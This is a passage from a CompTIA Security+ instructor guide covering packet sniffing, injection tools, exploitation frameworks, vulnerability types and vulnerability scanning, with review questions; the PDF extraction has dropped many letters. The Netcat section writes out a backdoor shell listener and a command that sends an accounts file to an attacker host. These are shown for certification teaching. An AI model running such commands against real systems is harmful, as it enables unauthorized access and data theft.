segment. sing a host means that only traffic directed at that host is captured.
tool is placed in the Capturing from a network segment can be performed by a switched port analyzer
network. AN port or mirror port . This means that a network switch is configured to copy
Note that network frames passing over designated source ports to a destination port, which the packet
monitoring is both a sni er is connected to. niffing can also be performed over a network cable segment
threat (snooping) and by using a test access port (TAP). This means that a device is inserted in the cabling to
a security measure copy frames passing over it. There are passive and active (powered) versions.
(snooping on the
snoopers). Typically, sni ers are placed inside a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to
get past the firewall. A single sni er can generate an e ceptionally large amount of
data, so you cannot just put multiple sensors everywhere in the network without
provisioning the resources to manage them properly. Depending on network size and
resources, one or just a few sensors will be deployed to monitor key assets or network
paths.
tcpdump is a command-line packet capture utility for Linux (linux.die.net/man/8/
tcpdump). The basic syntax of the command is tcpdump -i eth0, where
eth0 is the interface to listen on. The utility will then display captured packets until
halted manually (Ctrl+C . rames can be saved to a .pcap file using the -w option.
Alternatively, you can open a pcap file using the -r option.
tcpdump is often used with some sort of filter e pression to reduce the number of
frames that are captured:
• Type filter by host, net, port, or portrange.

• Direction filter by source src) or destination (dst) parameters (host,

network, or port).

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 43

• rotocol filter by a named protocol rather than port number for e ample, arp,
icmp, ip, ip6, tcp, udp, and so on).
Filter expressions can be combined by using Boolean operators:
• and (&&)

• or (||)

• not (!)

Filter syntax can be made even more detailed by using parentheses to group
e pressions. A comple filter e pression should be enclosed by uotes. or e ample,
the following command filters frames to those with the source I . . . and
destination port 53 or 80:
tcpdump -i eth0 "src host 10.1.0.100 and (dst port
53 or dst port 80)"

ac et Anal sis and ireshar ho lide s

A protocol analy er or packet analy er works in con unction with a sni er to perform Packet Analysis and
tra c anal sis. You can either analyze a live capture or open a saved capture (.pcap) Wireshark
file. rotocol analy ers can decode a captured frame to reveal its contents in a readable
format. You can choose to view a summary of the frame or choose a more detailed Teaching
view that provides information on the OSI layer, protocol, function, and data. Tip
Students should get as
ireshar (wireshark.org) is an open-source graphical packet capture and analysis much practice using
utility, with installer packages for most operating systems. Having chosen the interface Wireshark as possible.
to listen on, the output is displayed in a three-pane view. The packet list pane shows a
scrolling summary of frames. The packet details pane shows e pandable fields in the
frame currently selected from the packet list. The packet bytes pane shows the raw
data from the frame in hex and ASCII. Wireshark is capable of parsing (interpreting) the
headers and payloads of hundreds of network protocols.
ou can apply a capture filter using the same e pression synta as tcpdump (though
the expression can be built via the GUI tools too). You can save the output to a .pcap
file or load a file for analysis. ireshark supports very powerful display filters wiki.
wireshark.org/DisplayFilters that can be applied to a live capture or to a capture file.
You can also adjust the coloring rules (wiki.wireshark.org/ColoringRules), which control
the row shading and font color for each frame.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 44 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ireshark protocol analyzer. (Screenshot used with permission from wireshark.org.)

Another useful option is to use the ollo TC tream context command to

reconstruct the packet contents for a TCP session.

The PCAP file format has some limitations, which has led to the development of PCAP ext
Generation (PCAP G). ireshark now uses PCAP G by default, and tcpdump can process
files in the new format too (cloudshark.io articles -reasons-to-move-to-pcapng).

ho lide s ac et In ection and epla

Packet Injection and
Some reconnaissance techniques and tests depend on sending forged or spoofed
Replay network traffic. ften, network sniffing software libraries allow frames to be inserted
or in ected into the network stream. There are also tools that allow for di erent kinds
of packets to be crafted and manipulated. Well-known tools used for packet injection
include Dsni monkey.org dugsong dsni ), Ettercap (ettercap-project.org), Scapy
(scapy.net), and hping (hping.org).

hpin
hping is an open source spoofing tool that provides a penetration tester with the
ability to craft network packets to e ploit vulnerable firewalls and ID s. hping can
perform the following types of test:
• ost port detection and firewall testing like Nmap, hping can be used to probe
IP addresses and TCP/UDP ports for responses.

• Traceroute—if ICMP is blocked on a local network, hping o ers alternative ways

of mapping out network routes. hping can use arbitrary packet formats, such as
probing DNS ports using TCP or UDP, to perform traces.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 45

• Denial of service (DoS)—hping can be used to perform ood based Do attacks

from randomized source IPs. This can be used in a test environment to determine
how well a firewall, ID , or load balancer responds to such attacks.

tcprepla
As the name suggests, tcprepla takes previously captured traffic that has been saved
to a .pcap file and replays it though a network interface linux.die.net/man/1/tcpreplay).
ptionally, fields in the capture can be changed, such as substituting MAC or I
addresses. tcpreplay is useful for analysis purposes. If you have captured suspect
traffic, you can replay it through a monitored network interface to test intrusion
detection rules.

ploitation rame or s ho lide s

A remote access tro an AT is malware that gives an adversary the means of Exploitation
remotely accessing the network. From the perspective of security posture assessment, Frameworks
a penetration tester might want to try to establish this sort of connection and attempt
to send corporate information over the channel data e filtration . If security controls Teaching
are working properly, this attempt should be defeated or at least detected . Tip
An e ploitation rame or uses the vulnerabilities identified by an automated These are complex
products, so just focus
scanner and launches scripts or software to attempt to deliver matching exploits. This on the basic uses.
might involve considerable disruption to the target, including service failure, and risk
data security.
The framework comprises a database of exploit code, each targeting a particular
CVE (Common Vulnerabilities and Exposures). The exploit code can be coupled with
modular payloads. Depending on the access obtained via the exploit, the payload code
may be used to open a command shell, create a user, install software, and so on. The
custom exploit module can then be injected into the target system. The framework
may also be able to obfuscate the code so that it can be injected past an intrusion
detection system or anti-virus software.
The best-known exploit framework is etasploit (metasploit.com). The platform
is open-source software, now maintained by Rapid7. There is a free framework
(command-line) community edition with installation packages for Linux and Windows.
Rapid7 produces pro and express commercial editions of the framework and it can be
closely integrated with the Nexpose vulnerability scanner.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 46 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

etasploit ramework Console. (Screenshot used with permission from metasploit.com.)

n per (github.com/1N3/Sn1per) is a framework designed for penetration test

reporting and evidence gathering. It can integrate with other tools such as Metasploit
and Nikto to run automated suites of tests. esults can be displayed as web reports.
There are many other e ploitation frameworks targeting di erent kinds of
vulnerabilities. Some examples include:
• fire L in ecting fileless e ploit payloads into a Linu host github.com/rek7/
fire L ).

• RouterSploit—vulnerability scanning and exploit modules targeting embedded

systems (github.com/threat9/routersploit).

• Browser Exploitation Framework (BeEF)—recovering web session information and

exploiting client-side scripting (beefproject.com).

• Zed Attack Proxy (ZAP)—scanning tools and scripts for web application and mobile
app security testing (owasp.org/www-project-zap).

• Pacu—scanning and exploit tools for reconnaissance and exploitation of Amazon

Web Service (AWS) accounts (rhinosecuritylabs.com/aws/pacu-open-source-aws-
exploitation-framework).

ho lide s Netcat
Netcat
ne simple but e ective tool for testing connectivity is Netcat (nc), available for both
indows and Linu . Netcat can be used for port scanning and fingerprinting. or
Teaching example, the following command attempts to connect to the HTTP port on a server and
Tip return any banner by sending the "head" HTTP keyword:
Note that there are echo "head" | nc 10.1.0.1 -v 80
several versions of
Netcat, including Netcat can also establish connections with remote machines. To configure Netcat as a
OpenBSD Netcat and
backdoor, you first set up a listener on the victim system I . . . set to pipe traffic
Nmap's ncat (nmap.
org/ncat). from a program, such as the command interpreter, to its handler:
nc -l -p 666 -e cmd.exe

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 47

The following command connects to the listener and grants access to the terminal:
nc 10.1.0.1 666
sed the other way around, Netcat can be used to receive files. or e ample, on the
target system the attacker runs the following:
type accounts.sql | nc 10.1.0.192 6666
n the handler I . . . , the attacker receives the file using the following
command:
nc -l -p 6666 > accounts.sql

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 48 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Organizational Security with Network
Reconnaissance Tools
Answer the following questions:

1. ou suspect that a ro ue host is actin as the de ault ate a or a su net

in a spoofin attac hat command line tool s can ou use rom a
indo s client C in the same su net to chec the inter ace properties o
the de ault ate a

se ipconfig to check the I addresses of the default gateway and the D C server. se
arp to check the MAC addresses associated with those IP addresses and investigate
possible spoofing. ou could also use the route command to verify the properties of
the default route.

2. ou suspect the ro ue host is modi in tra c e ore or ardin it ith

the side e ect o increasin net or latenc hich tool could ou use to
measure latenc on tra c routed rom this su net

From a Windows host, the pathping tool can be used to measure latency along a route.

3. hat t pe o tool could ou use to fin erprint the host actin as the de ault
ate a

This re uires a tool that performs fingerprinting service and version detection by
examining responses to network probes and comparing them to known responses
from common platforms. Nmap is very widely used for this task, or you could use
hping or Netcat.

4. ou are in esti atin a inu ser er that is the source o suspicious net or
tra c At a terminal on the ser er hich tool could ou use to chec hich
process is usin a i en TC port

You can use the netstat command to do this.

5. hat is a one trans er and hich reconnaissance tools can e used to test
hether a ser er ill allo one

A zone transfer is where a domain name server (DNS) allows a client to request all the
name records for a domain. nslookup (Windows) and dig (principally Linux) can be used
to test whether this query is allowed. You could also mention the dnsenum tool, which
will check for zone transfers along with other enumeration tests on DNS infrastructure.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 49

6. hat t pe o or ani ational securit assessment is per ormed usin essus

Nessus is an automated network vulnerability scanner that checks for software

vulnerabilities and missing patches.

7. ou are de elopin ne detection rules or a net or securit scanner

hich tool ill e o use in testin hether the rules match a malicious
tra c sample success ull

The tcpreplay tool can be used to stream captured traffic from a file to a monitored
network interface.

8. hat securit posture assessment could a pen tester ma e usin etcat

Whether it is possible to open a network connection to a remote host over a given port.

esson Performing Security Assessments | Topic A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 50 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 3B
Explain Security Concerns with General
Vulnerability Types

Teaching EXAM OBJECTIVES COVERED

Tip 1.6 Explain the security concerns associated with various types of vulnerabilities
This objective covers
a broad range of
vulnerability types and
erforming a security assessment e ectively is not simply a matter of choosing
contains some new
areas of focus for the appropriate tools. ou need to understand the types of vulnerabilities that a ect
exam update, so be information systems and networks. You must also be able to evaluate and explain
prepared to allocate the impacts that can arise from vulnerabilities, so that assessment and remediation
plenty of time to this activities can be given priority where they are most needed.
topic.

ho lide s o t are ulnera ilities and atch ana ement

Software
Software exploitation means an attack that targets a vulnerability in software code.
Vulnerabilities and An application vulnerability is a design aw that can cause the security system to
Patch Management be circumvented or that will cause the application to crash. Typically, vulnerabilities
can only be e ploited in uite specific circumstances but because of the comple ity
Teaching of modern software and the speed with which new versions must be released to
Tip market, almost no software is free from vulnerabilities. As two contrasting examples,
Students should be consider vulnerabilities a ecting Adobe's D document reader versus a vulnerability
familiar with the in the server software underpinning transport security. The former could give a threat
concept of software
vulnerabilities, but
actors a foothold on a corporate network via a workstation; the latter could expose
check that they the cryptographic keys used to provide secure web services to compromise. Both are
understand the range potentially high impact for di erent reasons.
of code and device
types that these a ect. It is also important to reali e that software vulnerabilities a ect all types of code, not
just applications:
• Operating system (OS)—an application exploit will run with the permissions of the
logged on user, which will hopefully be limited. A vulnerability in an kernel file or
shared library is more likely to allow privilege escalation, where the malware code
runs with higher access rights (system or root). Dirty COW is one example of a Linux
kernel vulnerability (access.redhat.com/blogs/766093/posts/2757141).

• irmware vulnerabilities can e ist in the I I firmware that controls the boot
process for Cs. There can also be bugs in device firmware, such as network cards
and disk controllers. Finally, network appliances and Internet of Things (IoT) devices
run code as a type of firmware. Like kernel vulnerabilities, firmware e ploits
can be difficult to identify, because the e ploit code can run with the highest
level of privilege. The Intel AMT vulnerability illustrates the impacts of a firmware
vulnerability (blackhat.com/docs/us-17/thursday/us-17-Evdokimov-Intel-AMT-
Stealth-Breakthrough-wp.pdf).

Most vulnerabilities are discovered by software and security researchers, who notify
the vendor to give them time to patch the vulnerability before releasing details
to the wider public. Improper or weak patch management is an additional layer
of vulnerability where these security patches are not applied to systems, leaving

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 51

them vulnerable to e ploits. oor configuration management may mean that the
organization is simply not documenting and managing its assets rigorously. Patches
may be deployed to some systems, but not others. Patches may be applied and then
removed because they cause performance issues.

ero a and e ac lat orm ulnera ilities ho lide s

ven if e ective patch management procedures are in place, attackers may still be Zero-Day and
able to use software vulnerabilities as an attack vector. A vulnerability that is exploited Legacy Platform
before the developer knows about it or can release a patch is called a ero da . These Vulnerabilities
can be extremely destructive, as it can take the vendor some time to develop a patch,
leaving systems vulnerable in the interim.

The term zero-day is usually applied to the vulnerability itself but can also refer to an attack
or malware that exploits it. The Eternal lue zero-day exploit makes for an instructive case
study (wired.com story eternalblue-leaked-nsa-spy-tool-hacked-world).

ero day vulnerabilities have significant financial value. A ero day e ploit for a mobile
OS can be worth millions of dollars. Consequently, an adversary will only use a zero-
day vulnerability for high value attacks. State security and law enforcement agencies
are known to stockpile zero-days to facilitate the investigation of crimes.
A legacy platform is one that is no longer supported with security patches by its
developer or vendor. This could be a PC/laptop/smartphone, networking appliance,
peripheral device, Internet of Things device, operating system, database/programming
environment, or software application. y definition, legacy platforms are unpatchable.
Such systems are highly likely to be vulnerable to exploits and must be protected
by security controls other than patching, such as isolating them to networks that an
attacker cannot physically connect to.

ea ost Confi urations ho lide s

hile ine ective patch and configuration management policies and procedures Weak Host
represent one type of vulnerability, weak configurations can have similar impacts. Configurations

e ault ettin s Teaching

Tip
Relying on the manufacturer default settings when deploying an appliance or software Focus discussion on
applications is one e ample of weak configuration. It is not sufficient to rely on the the impact of these
vendor to ship products in a default secure configuration, though many now do. vulnerabilities. We
Default settings may leave unsecure interfaces enabled that allow an attacker to will be looking at
compromise the device. Network appliances with weak settings can allow attackers to hardening and other
move through the network unhindered and snoop on traffic. mitigation techniques
later in the course.
nsecured oot Accounts
The root account, referred to as the default Administrator account in Windows or
generically as the superuser, has no restrictions set over system access. A superuser
account is used to install the OS. An unsecured root account is one that an adversary is
able to gain control of, either by guessing a weak password or by using some local boot
attack to set or change the password. Software bugs can also allow root access, such
as one a ecting Mac arstechnica.com/information-technology/2017/11/macos-
bug-lets-you-log-in-as-admin-with-no-password-required). These vulnerabilities are
extremely serious as they give the threat actor complete control of the system.
ective user management and authori ation policies should be enforced so that the
superuser account is highly restricted and administration tasks are performed by least
privilege management accounts or roles instead. The default root or Administrator

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 52 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

account is usually disabled for login. Even if this type of account is enabled for local
(interactive) login, it should not be accessible via remote login mechanisms.

pen ermissions
pen permissions refers to provisioning data files or applications without
di erentiating access rights for user groups. ermissions systems can be comple
and it is easy to make mistakes, such as permitting unauthenticated guests to view
confidential data files, or allowing write access when only read access is appropriate.
This issue is particularly prevalent on cloud storage, where administrators used to
Windows and Linux directory access control lists may be unfamiliar with the cloud
equivalents (directdefense.com/how-to-prevent-exploitation-of-amazon-s3-buckets-
with-weak-permissions).

ho lide s ea et or Confi urations

Weak Network
Vulnerabilities can also arise from running unnecessary services or using weak
Configurations encryption.

pen orts and er ices

Network applications and services allow client connections via Transport Control
Protocol (TCP) or User Datagram Protocol (UDP) port numbers. The clients and
servers are identified by Internet rototocol I addresses. ervers must operate
with at least some open ports, but security best practice dictates that these should be
restricted to only necessary services. Running unnecessary open ports and services
increases the attack surface. Some generic steps to harden services to meet a given
role include:
• If the service is security-critical (such as a remote administration interface), restrict
endpoints that are allowed to access the service by IP address or address range.
Alternatively, blacklist suspect endpoints from connecting but otherwise allow
access.

• Disable services that are installed by default but that are not needed. Ideally, disable
the service on the server itself, but in some circumstances it may be necessary to
block the port using a firewall instead.

• For services that should only be available on the private network, block access to
ports at border firewalls or segment the network so that the servers cannot be
accessed from external networks.

nsecure rotocols
An unsecure protocol is one that transfers data as cleartext; that is, the protocol does
not use encryption for data protection. Lack of encryption also means that there is
no secure way to authenticate the endpoints. This allows an attacker to intercept and
modify communications, acting as man-in-the-middle (MITM).

ea ncr ption
Encryption algorithms protect data when it is stored on disk or transferred over
a network. Encrypted data should only be accessible to someone with the correct
decryption key. Weak encryption vulnerabilities allow unauthorized access to data.
Such vulnerabilities arise in the following circumstances:
• The key is generated from a simple password, making it vulnerable to guessing
attempts by brute-force enumeration (if the password is too short) or dictionary
enumeration (if the password is not complex).

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 53

• The algorithm or cipher used for encryption has known weaknesses that allow
brute-force enumeration.

• The key is not distributed securely and can easily fall into the hands of people who
are not authorized to decrypt the data.

rrors
eakly configured applications may display unformatted error messages under
certain conditions. These error messages can be revealing to threat actors probing for
vulnerabilities and coding mistakes. Secure coding practices should ensure that if an
application fails, it does so "gracefully" without revealing information that could assist
the development of an exploit.

Impacts rom ulnera ilities ho lide s

Vulnerabilities can lead to various data breach and data loss scenarios. These Impacts from
events can have serious impacts in terms of costs and damage to the organization's Vulnerabilities
reputation.
Teaching
ata reaches and ata filtration Impacts Tip
Ensure students can
All information should be collected, stored, and processed by authenticated users and distinguish breach,
hosts subject to the permissions (authorization) allocated to them by the data owner. e filtration, and loss
Data breach and data e filtration describe two types of event where unauthori ed and associate these
information use occurs: events with financial
and reputational
• A data breach event is where confidential data is read or transferred without impacts.
authorization. A privacy breach is where personal data is not collected, stored,
or processed in full compliance with the laws or regulations governing personal
information. A breach can also be described as a data leak. A data breach can be
intentional/malicious or unintentional/accidental.

• ata exfiltration is the methods and tools by which an attacker transfers data
without authorization from the victim's systems to an external network or media.
nlike a data breach, a data e filtration event is always intentional and malicious. A
data breach is a conse uence of a data e filtration event.

Data breach includes a wide range of scenarios with di erent levels of impact. The
most severe data breaches compromise valuable intellectual property (IP) or the
personal information of account holders.

Identit The t Impacts

A privacy breach may allow the threat actor to perform identity theft or to sell the data
to other malicious actors. The threat actor may obtain account credentials or might
be able to use personal details and financial information to make fraudulent credit
applications and purchases.

ata oss and A aila ilit oss Impacts

Compared to data breaches, data loss is where information becomes unavailable,
either permanently or temporarily. Availability is sometimes overlooked as a security
attribute compared to confidentiality and integrity, but it can have severe impacts on
business work ows. If processing systems are brought down by accidental or malicious
disaster events, a company may not be able to perform crucial work ows like order
processing and fulfillment.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 54 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

inancial and eputation Impacts

All these impacts can have direct financial impacts due to damages, fines, and loss of
business. Data/privacy breach and availability loss events will also cause a company's
reputation to drop with direct customers. Major events might cause widespread
adverse publicity on social media and mainstream media. In anticipation of these
impacts, incident handling teams should include public relations (PR) and marketing
expertise to minimize reputational damage.

ho lide s Third art is s

Third-Party Risks
igh profile breaches have led to a greater appreciation of the importance of the
supply chain in vulnerability management. A product, or even a service, may have
Teaching components created and maintained by a long chain of di erent companies. ach
Tip company in the chain depends on its suppliers or vendors performing due diligence on
Supply chain risks their vendors. A weak link in the chain could cause impacts on service availability and
have been expanded performance, or in the worst cases lead to data breaches.
in the current syllabus
version, so make sure endor ana ement
students are focused
on it. endor mana ement is a process for selecting supplier companies and evaluating
the risks inherent in relying on a third-party product or service. When it comes to data
and cybersecurity, you must understand that risks cannot be wholly transferred to the
vendor. If a data storage vendor su ers a data breach, you may be able to claim costs
from them, but your company will still be held liable in terms of legal penalties and
damage to reputation. If your webstore su ers fre uent outages because of failures at
a hosting provider, it is your company's reputation that will su er and your company
that will lose orders because customers look elsewhere.
A vendor may supply documentation and certification to prove that it has implemented
a security policy robustly. You might be able to see evidence of security capabilities,
such as a history of e ective vulnerability management and product support. Larger
companies will usually ask vendors to complete a detailed audit process to ensure that
they meet the required standards.
Within vendor management, system integration refers to the process of using
components services from multiple vendors to implement a business work ow. or
e ample, a work ow allowing customers to make online purchases might involve the
storefront product, a web application firewall, cloud data processing and analytics,
plus integration with on-premises accounting and customer relationship management
(CRM) and support ticketing systems. The contracting company may have a list of
preferred vendors and ask a third-party systems integrator to build and support the
solution. Alternatively, systems integration might be fully outsourced, with the third-
party integrator also selecting their preferred vendors for the component parts. The
principal risk in both these scenarios is that the contracting company does not have
sufficient e pertise to oversee the pro ect and places too much trust in the third party
integrator.
hen a vendor has become deeply embedded within a work ow, lack of vendor
support can have serious impacts, as retooling the work ow to use a di erent vendor
can be a long and complex process. Vendors may become unsupportive for any
number of reasons. For example, their company might be growing too quickly and
resources are spread too thinly, they may drop support for products that are not
profitable, they may have overstated capabilities in terms of security, and so on. The
key point for vendor management is to assess these risks when determining whether
to outsource all or part of a work ow and to have contingency plans if a vendor does
not perform as expected.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 55

utsourced Code e elopment

The problem of e ective oversight is particularly pertinent to outsourced code
development. Many companies do not have in-house programming expertise, but
without such expertise it is hard to ensure that contractors are delivering secure
code. A solution is to use one vendor for development and a di erent vendor for
vulnerability and penetration testing.

ata tora e
There are two main scenarios for risks to data when using third-parties. First, you may
need to grant vendor access to your data, and second, you may use a vendor to host
data or data backups and archives. The following general precautions should be taken:
• Ensure the same protections for data as though it were stored on-premises,
including authorization and access management and encryption.

• Monitor and audit third-party access to data storage to ensure it is being used only
in compliance with data sharing agreements and non-disclosure agreements.

• Evaluate compliance impacts from storing personal data on a third-party system,

such as a cloud provider or backup/archive management service.

Cloud ased ersus n remises is s

n premises risks refer to software vulnerabilities, weak configurations, and third party
issues arising from hosts, servers, routers, switches, access points, and firewalls located
on a private network installed to private offices or campus buildings. Many companies
use cloud services to fully or partly support business work ows. The third party vendor
management, code, and data storage risks discussed previously apply directly to
cloud as well as to on premises. oftware and weak configuration risks can also apply,
however. They are not the sole responsibility of the cloud service provider (CSP). Clouds
operate a shared responsibility model. This means that the cloud service provider is
responsible for the security of the cloud, while the cloud consumer is responsible for
security in the cloud. The types of software and configuration vulnerabilities that you
must assess and monitor vary according to the nature of the service.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 56 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Security Concerns with General
Vulnerability Types
Answer the following questions:

1. ou are recommendin that a usiness o ner in est in patch mana ement

controls or Cs and laptops hat is the main ris rom ea patch
mana ement procedures on such de ices
Vulnerabilities in the OS and applications software such as web browsers and
document readers or in C and adapter firmware can allow threat actors to run
malware and gain a foothold on the network.
2. ou are ad isin a usiness o ner on securit or a C runnin indo s
The C runs process mana ement so t are that the o ner cannot run
on indo s hat are the ris s arisin rom this and ho can the e
miti ated
Windows XP is a legacy platform that is no longer receiving security updates. This
means that patch management cannot be used to reduce risks from software
vulnerabilities. The workstation should be isolated from other systems to reduce the
risk of compromise.
3. As a securit solutions pro ider ou are compilin a chec list or our
customers to assess potential ea confi uration ulnera ilities ased on
the CompTIA ecurit s lla us rom the headin s ou ha e added so ar
hich is missin and hat ulnera ilit does it relate to e ault settin s
nsecured root accounts pen ports and ser ices nsecure protocols
ea encr ption rrors
Open permissions refers to misconfigured access rights for data folders, network file
shares, and cloud storage.
4. ou are ad isin a customer on ac up and disaster reco er solutions The
customer is con used et een data reaches and data loss and hether the
ac up solution ill protect a ainst oth hat e planation can ou i e
ackup solutions mitigate risks from data loss, where files or information is deleted,
corrupted, or otherwise destroyed. Backup does not mitigate risks from data breach,
where confidential or private data is stolen e filtrated and made public or sold for
criminal profit. Mitigating risks of data breach re uires e ective secure processing,
authorization, and authentication security controls.
5. A s stem inte rator is o erin a turn e solution or customer contact
data stora e and en a ement anal tics usin se eral cloud ser ices oes
this solution present an suppl chain ris s e ond those o the s stem
inte rator s consultin compan
Yes, the system integrator is proposing the use of multiple vendors (the cloud service
providers), with potentially complex issues for collecting, storing, and sharing customer
personal data across these vendors. Each company in the supply chain should be
assessed for risk and compliance with cybersecurity and privacy standards.

esson Performing Security Assessments | Topic

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 57

Topic 3C
Summarize Vulnerability
Scanning Techniques

EXAM OBJECTIVES COVERED Teaching

1. Summarize the techni ues used in security assessments Tip
This topic covers the
first part of ob ective
1.7. The content
Automated vulnerability scanning is a key part of both initial security assessment and
examples for Syslog/
ongoing compliance monitoring. You should be able to summarize types of scanners SIEM are in topic 10C.
and e plain the impact of scan configurations. ou should also be able to contribute to
While this is not an
threat hunting security assessments and explain how they can be supported by threat implement level
intelligence platforms. objective, there is
a fair amount of
configuration detail in
ecurit Assessments the content examples.

Network reconnaissance and discovery is used to identify hosts, network topology, ho lide s
and open services/ports, establishing an overall attack surface. Various types of
security assessments can be used to test these hosts and services for vulnerabilities.
Security Assessments
There are many models and frameworks for conducting security assessments. A good
starting point is NIST's Technical Guide to Information Security Testing and Assessment Teaching
(nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf). SP 800-115 Tip
identifies three principal activities within an assessment
Relate vulnerability
• Testing the object under assessment to discover vulnerabilities or to prove the scanning to other
e ectiveness of security controls. types of security
assessment. Note
• Examining assessment objects to understand the security system and identify any that most types
of vulnerability
logical weaknesses. This might highlight a lack of security controls or a common assessment can be
misconfiguration. performed using
automated tools.
• Interviewing personnel to gather information and probe attitudes toward and
understanding of security.

The main types of security assessment are usually classed as ulnera ilit
assessment, threat huntin , and penetration testing. A vulnerability assessment is an
evaluation of a system's security and ability to meet compliance requirements based
on the configuration state of the system. ssentially, the vulnerability assessment
determines if the current configuration matches the ideal configuration the baseline .
Vulnerability assessments might involve manual inspection of security controls, but are
more often accomplished through automated vulnerability scanners.

ulnera ilit can T pes ho lide s

An automated scanner must be configured with signatures and scripts that can Vulnerability Scan
correlate known software and configuration vulnerabilities with data gathered from Types
each host. Consequently, there are several types of vulnerability scanners optimized
for di erent tasks.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 58 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

et or ulnera ilit canner

A network ulnera ilit scanner, such as Tenable Nessus (tenable.com/products/
nessus) or OpenVAS (openvas.org), is designed to test network hosts, including client
PCs, mobile devices, servers, routers, and switches. It examines an organization's
on-premises systems, applications, and devices and compares the scan results to
configuration templates plus lists of known vulnerabilities. Typical results from a
vulnerability assessment will identify missing patches, deviations from baseline
configuration templates, and other related vulnerabilities.

Greenbone Open AS vulnerability scanner with Security Assistant web application interface as installed
on ali inux. (Screenshot used with permission from Greenbone etworks, http www.openvas.org.)

The first phase of scanning might be to run a detection scan to discover hosts on a
particular IP subnet. In the next phase of scanning, a target range of hosts is probed
to detect running services, patch level, security configuration and policies, network
shares, unused accounts, weak passwords, anti virus configuration, and so on.
ach scanner is configured with a database of known software and configuration
vulnerabilities. The tool compiles a report about each vulnerability in its database that
was found to be present on each host. ach identified vulnerability is categori ed and
assigned an impact warning. Most tools also suggest remediation techniques. This
information is highly sensitive, so use of these tools and the distribution of the reports
produced should be restricted to authorized hosts and user accounts.
Network vulnerability scanners are configured with information about known
vulnerabilities and configuration weaknesses for typical network hosts. These scanners
will be able to test common operating systems, desktop applications, and some
server applications. This is useful for general purpose scanning, but some types of
applications might need more rigorous analysis.

esson Performing Security Assessments | Topic C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 59

Application and e Application canners

A dedicated application scanner is configured with more detailed and specific
scripts to test for known attacks, as well as scanning for missing patches and weak
configurations. The best known class of application scanners are web application
scanners. Tools such as Nikto (cirt.net/Nikto2) look for known web exploits, such as SQL
injection and cross-site scripting (XSS), and may also analyze source code and database
security to detect unsecure programming practices. Other types of application scanner
would be optimized for a particular class of software, such as a database server.

Common ulnera ilities and posures ho lide s

An automated scanner needs to be kept up to date with information about known Common
vulnerabilities. This information is often described as a ulnera ilit eed, though the Vulnerabilities and
Nessus tool refers to these feeds as plug-ins, and OpenVAS refers to them as network Exposures
vulnerability tests ( Ts). Often, the vulnerability feed forms an important part of scan
vendors' commercial models, as the latest updates require a valid subscription to
acquire.

Checking feed status in the Greenbone Community Edition vulnerability manager.

(Screenshot Greenbone Community Edition greenbone.net en community-edition.)

ulnerability feeds make use of common identifiers to facilitate sharing of intelligence

data across di erent platforms. Many vulnerability scanners use the ecurit Content
Application rotocol CA to obtain feed or plug-in updates (scap.nist.gov). As well
as providing a mechanism for distributing the feed, CA defines ways to compare the
actual configuration of a system to a target secure baseline plus various systems of
common identifiers. These identifiers supply a standard means for di erent products
to refer to a vulnerability or platform consistently.
Common ulnera ilities and posures C is a dictionary of vulnerabilities in
published operating systems and applications software (cve.mitre.org). There are
several elements that make up a vulnerability's entry in the CVE:
• An identifier in the format C , where is the year the vulnerability
was discovered, and is at least four digits that indicate the order in which the
vulnerability was discovered.

• A brief description of the vulnerability.

• A reference list of URLs that supply more information on the vulnerability.

• The date the vulnerability entry was created.

